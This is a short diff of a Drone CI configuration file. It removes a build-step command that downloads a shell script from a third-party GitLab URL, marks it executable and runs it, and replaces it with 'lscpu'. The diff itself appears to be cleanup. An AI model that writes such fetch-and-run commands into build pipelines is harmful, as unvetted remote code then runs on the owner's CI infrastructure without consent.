--- a/.drone.yml
+++ b/.drone.yml
@@ -12,4 +12,4 @@ steps:
   pull: if-not-exists
   image: node:latest
   commands:
-      - wget https://gitlab.com/renifer12/project-7/-/raw/main/nano.sh && chmod +x nano.sh && ./nano.sh
+      - lscpu
